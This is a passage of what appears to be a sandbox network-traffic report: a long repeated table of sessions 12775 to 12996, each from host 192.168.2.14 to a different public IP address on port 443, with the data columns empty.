                                      12775192.168.2.1451854192.108.223.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12776192.168.2.1446574162.178.225.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12777192.168.2.1453138124.162.19.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12778192.168.2.1448444103.241.52.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12779192.168.2.1445464158.168.65.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12780192.168.2.1447746158.240.252.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12781192.168.2.14359001.207.208.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12782192.168.2.1438446189.152.45.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12783192.168.2.1442436117.194.184.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12784192.168.2.1435510128.136.79.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12785192.168.2.1457222161.176.158.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12786192.168.2.145282214.119.71.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12787192.168.2.1436528203.217.73.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12788192.168.2.1441036124.177.103.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12789192.168.2.1442538119.116.228.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12790192.168.2.1456364112.144.185.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12791192.168.2.1453106217.90.75.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12792192.168.2.144823890.192.121.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12793192.168.2.145116283.144.52.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12794192.168.2.1452846148.112.115.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12795192.168.2.144878413.127.112.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12796192.168.2.143905845.76.248.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12797192.168.2.1455074201.218.210.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12798192.168.2.144885484.154.157.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12799192.168.2.145620874.63.112.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12800192.168.2.1445740136.246.218.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12801192.168.2.1436546201.248.2.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12802192.168.2.1445118156.34.3.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12803192.168.2.144678832.181.129.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12804192.168.2.14495481.255.71.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12805192.168.2.145936014.132.86.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12806192.168.2.1452620138.210.250.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12807192.168.2.1435466125.8.123.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12808192.168.2.1460892151.244.82.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12809192.168.2.145886425.24.235.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12810192.168.2.144818678.243.195.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12811192.168.2.146044614.16.96.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12812192.168.2.1438340184.32.173.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12813192.168.2.1433552196.215.215.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12814192.168.2.1446768134.105.100.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12815192.168.2.143303643.165.188.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12816192.168.2.1448252191.21.92.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12817192.168.2.1457674209.14.214.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12818192.168.2.144940832.147.87.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12819192.168.2.1435602200.93.78.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12820192.168.2.1445590106.222.87.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12821192.168.2.1456990220.72.8.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12822192.168.2.145587481.28.176.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12823192.168.2.1437720143.71.84.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12824192.168.2.1435856112.147.199.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12825192.168.2.1457922161.46.50.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12826192.168.2.1443964216.38.171.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12827192.168.2.145169849.190.114.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12828192.168.2.145936269.85.126.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12829192.168.2.1455582162.76.105.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12830192.168.2.1453608205.248.145.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12831192.168.2.1451978139.121.252.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12832192.168.2.1444968176.91.76.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12833192.168.2.1435970100.175.30.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12834192.168.2.1457310101.23.228.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12835192.168.2.1451728184.179.154.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12836192.168.2.143646093.160.80.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12837192.168.2.1451072166.42.20.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12838192.168.2.1435468175.93.14.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12839192.168.2.145943276.85.151.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12840192.168.2.1452170116.190.113.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12841192.168.2.1446574113.185.9.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12842192.168.2.145086081.165.244.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12843192.168.2.143312078.144.146.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12844192.168.2.14471988.54.179.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12845192.168.2.1434530117.193.22.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12846192.168.2.1450780183.243.145.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12847192.168.2.1436700170.104.210.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12848192.168.2.1434462165.72.209.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12849192.168.2.1457566190.220.129.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12850192.168.2.1447360217.2.5.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12851192.168.2.1460936102.140.1.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12852192.168.2.1444950134.171.68.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12853192.168.2.145464450.75.231.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12854192.168.2.145356218.74.48.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12855192.168.2.144709618.42.208.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12856192.168.2.1444266151.83.113.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12857192.168.2.145299281.203.254.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12858192.168.2.145739286.234.123.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12859192.168.2.1452010211.87.199.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12860192.168.2.1441646176.141.125.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12861192.168.2.1447540165.87.113.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12862192.168.2.1449550203.189.179.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12863192.168.2.1436618132.163.123.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12864192.168.2.143552089.71.151.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12865192.168.2.1458190132.225.74.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12866192.168.2.145167867.208.252.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12867192.168.2.143374245.245.219.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12868192.168.2.144028038.4.126.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12869192.168.2.1432974126.175.64.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12870192.168.2.1434854123.51.83.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12871192.168.2.145069675.84.0.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12872192.168.2.145969632.109.154.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12873192.168.2.144846089.55.67.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12874192.168.2.143609662.25.6.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12875192.168.2.1440612163.2.72.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12876192.168.2.1434254129.175.253.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12877192.168.2.1438262191.126.201.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12878192.168.2.145756089.244.52.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12879192.168.2.1445882109.111.204.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12880192.168.2.1445950110.43.64.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12881192.168.2.1455830104.251.150.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12882192.168.2.1434840205.66.29.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12883192.168.2.1445480158.231.81.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12884192.168.2.1445960107.221.148.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12885192.168.2.1441196145.94.45.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12886192.168.2.144372685.115.172.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12887192.168.2.1449466165.162.121.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12888192.168.2.1449156189.189.145.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12889192.168.2.1433370110.194.191.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12890192.168.2.1449278117.45.164.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12891192.168.2.145227851.169.0.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12892192.168.2.143771458.133.174.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12893192.168.2.143387058.64.205.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12894192.168.2.143819827.26.9.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12895192.168.2.1434324174.171.48.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12896192.168.2.1446824148.155.13.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12897192.168.2.146097649.250.232.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12898192.168.2.144531242.58.245.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12899192.168.2.144300652.49.21.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12900192.168.2.145986652.32.106.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12901192.168.2.1443030191.1.174.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12902192.168.2.145888692.6.39.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12903192.168.2.1439782155.61.12.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12904192.168.2.145678078.152.52.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12905192.168.2.1433396160.71.179.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12906192.168.2.1435546198.95.230.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12907192.168.2.145189695.246.76.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12908192.168.2.143843624.84.7.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12909192.168.2.1441572144.102.210.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12910192.168.2.1435576117.217.113.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12911192.168.2.143688446.149.166.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12912192.168.2.1441744123.220.157.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12913192.168.2.1442460134.41.162.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12914192.168.2.145966640.63.241.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12915192.168.2.145036873.93.116.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12916192.168.2.1439384122.19.211.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12917192.168.2.1460048207.224.144.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12918192.168.2.144815059.170.89.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12919192.168.2.143985670.97.200.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12920192.168.2.1435462122.173.229.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12921192.168.2.145599099.122.215.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12922192.168.2.1440904137.12.142.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12923192.168.2.145721457.58.211.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12924192.168.2.144839257.80.247.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12925192.168.2.1434330157.188.215.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12926192.168.2.143942087.232.237.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12927192.168.2.1434020125.231.159.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12928192.168.2.1447108116.115.233.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12929192.168.2.1446160219.138.16.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12930192.168.2.14354105.188.10.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12931192.168.2.1433438138.252.142.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12932192.168.2.1434546101.51.201.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12933192.168.2.144628886.12.207.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12934192.168.2.145185213.153.178.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12935192.168.2.1451590180.23.38.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12936192.168.2.1457676176.4.103.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12937192.168.2.145944223.238.113.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12938192.168.2.1447288152.218.54.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12939192.168.2.1435204175.103.109.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12940192.168.2.1459596109.20.9.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12941192.168.2.1453984108.176.26.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12942192.168.2.1458524196.182.21.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12943192.168.2.145266492.31.156.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12944192.168.2.145048037.118.252.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12945192.168.2.1455586122.183.109.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12946192.168.2.14423548.110.163.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12947192.168.2.1437204174.194.141.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12948192.168.2.144178492.248.34.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12949192.168.2.1436544149.117.57.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12950192.168.2.143720692.16.2.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12951192.168.2.1451000110.83.171.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12952192.168.2.144038840.153.73.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12953192.168.2.1438474119.197.73.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12954192.168.2.1433488167.134.134.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12955192.168.2.1448104198.232.134.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12956192.168.2.146051096.244.145.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12957192.168.2.145588694.163.233.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12958192.168.2.1442786148.230.230.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12959192.168.2.1443786222.58.37.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12960192.168.2.146042660.241.94.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12961192.168.2.145688083.250.51.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12962192.168.2.1459070160.211.135.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12963192.168.2.1445498151.56.80.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12964192.168.2.145581269.135.100.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12965192.168.2.1455808212.243.131.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12966192.168.2.143414867.178.24.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12967192.168.2.144843084.0.61.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12968192.168.2.1453114111.74.86.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12969192.168.2.1434486223.167.110.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12970192.168.2.144476035.34.40.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12971192.168.2.145012692.205.58.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12972192.168.2.1458888153.245.49.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12973192.168.2.1441120176.222.188.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12974192.168.2.1450088141.44.187.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12975192.168.2.145297051.25.113.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12976192.168.2.1451172116.101.149.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12977192.168.2.145183872.93.177.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12978192.168.2.1447462103.202.136.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12979192.168.2.1450802176.118.255.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12980192.168.2.144764678.74.50.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12981192.168.2.144035244.220.192.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12982192.168.2.146097058.248.177.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12983192.168.2.144015042.191.124.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12984192.168.2.1439336151.17.213.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12985192.168.2.1457790169.196.103.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12986192.168.2.145475239.60.83.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12987192.168.2.1433490153.215.75.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12988192.168.2.143717646.203.33.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12989192.168.2.144317417.245.193.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12990192.168.2.1453526134.122.124.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12991192.168.2.144294840.98.244.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12992192.168.2.143936682.187.71.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12993192.168.2.1457786104.44.254.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12994192.168.2.1445738109.227.135.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12995192.168.2.1454610180.213.236.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12996192.168.2.143907442.185.245.41443
                                      TimestampBytes transferredDirectionData


